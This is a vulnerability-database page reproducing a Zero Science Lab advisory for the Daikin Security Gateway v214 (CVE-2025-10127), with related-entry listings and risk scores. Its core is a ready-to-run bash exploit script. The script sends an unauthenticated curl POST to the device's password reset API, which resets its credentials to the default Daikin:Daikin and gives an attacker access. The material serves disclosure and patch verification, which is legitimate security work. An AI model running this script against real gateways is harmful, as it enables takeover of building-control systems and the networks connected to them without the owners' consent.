Lucene search
K

Daikin Security Gateway v214 Remote Password Reset

🗓️ 28 Apr 2025 00:00:00Reported by Gjoko KrsticType 
zeroscience
 zeroscience
🔗 www.zeroscience.mk👁 242 Views

Daikin Security Gateway v214 has a critical vulnerability allowing remote password reset and system access.

Related
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2025-10127
11 Sep 202510:00
circl
CNNVD
Daikin Security Gateway 授权问题漏洞
11 Sep 202500:00
cnnvd
CVE
CVE-2025-10127
11 Sep 202519:44
cve
Cvelist
CVE-2025-10127 Daikin Europe N.V Security Gateway Weak Password Recovery Mechanism for Forgotten Password
11 Sep 202519:44
cvelist
EUVD
EUVD-2025-28991
3 Oct 202520:07
euvd
ICS
Daikin Europe N.V Security Gateway
11 Sep 202506:00
ics
NVD
CVE-2025-10127
11 Sep 202520:15
nvd
Positive Technologies
PT-2025-37264
11 Sep 202500:00
ptsecurity
RedhatCVE
CVE-2025-10127
13 Sep 202520:29
redhatcve
Vulnrichment
CVE-2025-10127 Daikin Europe N.V Security Gateway Weak Password Recovery Mechanism for Forgotten Password
11 Sep 202519:44
vulnrichment
Rows per page
<html><body><p>#!/bin/bash
#
#
# Daikin Security Gateway v214 Remote Password Reset
#
#
# Vendor: Daikin Industries, Ltd.
# Product web page: https://www.daikin.com
# https://www.daikin.eu/en_us/products/product.html/DRGATEWAYAA.html
# Affected version: App: 100, Frm: 214
#
# Summary: The Security gateway allows the iTM and LC8 controllers
# to connect through the Security gateway to the Daikin Cloud Service.
# Instead of sending the report to the router directly, the iTM or
# LC8 controller sends the report to the Security gateway first. The
# Security gateway transforms the report format from http to https
# and then sends the transformed https report to the Daikin Cloud
# Service via the router. Built-in LAN adapter enabling online control.
#
# Desc: The Daikin Security Gateway exposes a critical vulnerability
# in its password reset API endpoint. Due to an IDOR flaw, an unauthenticated
# attacker can send a crafted POST request to this endpoint, bypassing
# authentication mechanisms. Successful exploitation resets the system
# credentials to the default Daikin:Daikin username and password combination.
# This allows attackers to gain unauthorized access to the system without
# prior credentials, potentially compromising connected devices and networks.
#
# Tested on: fasthttp
#
#
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
#                             @zeroscience
#
#
# Advisory ID: ZSL-2025-5931
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5931.php
#
#
# 21.03.2025
#

[ $# -ne 1 ] &amp;&amp; { echo "Usage: $0 <target_ip>"; exit 1; }

TARGET_IP="$1"
URL="https://$TARGET_IP/api/settings/password/reset"
PAYLOAD="t00t"

[[ ! $TARGET_IP =~ ^[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+$ ]] &amp;&amp; { echo "Bad IP."; exit 1; }

RESPONSE=$(curl -kX POST "$URL" -H "Content-type: application/json" -d "$PAYLOAD" 2&gt;/dev/null)

[ $? -ne 0 ] &amp;&amp; { echo "Can’t reach $TARGET_IP."; exit 1; }

if [[ $RESPONSE =~ \"Error\":0 ]]; then
  echo "Reset worked! Vulnerable."
elif [[ $RESPONSE =~ \"Error\":1 ]]; then
  echo "Not vulnerable."
else
  echo "Got: $RESPONSE"
fi
</target_ip></p></body></html>

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

28 Apr 2025 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 48.8
CVSS 3.19.8
EPSS0.00094
SSVC
242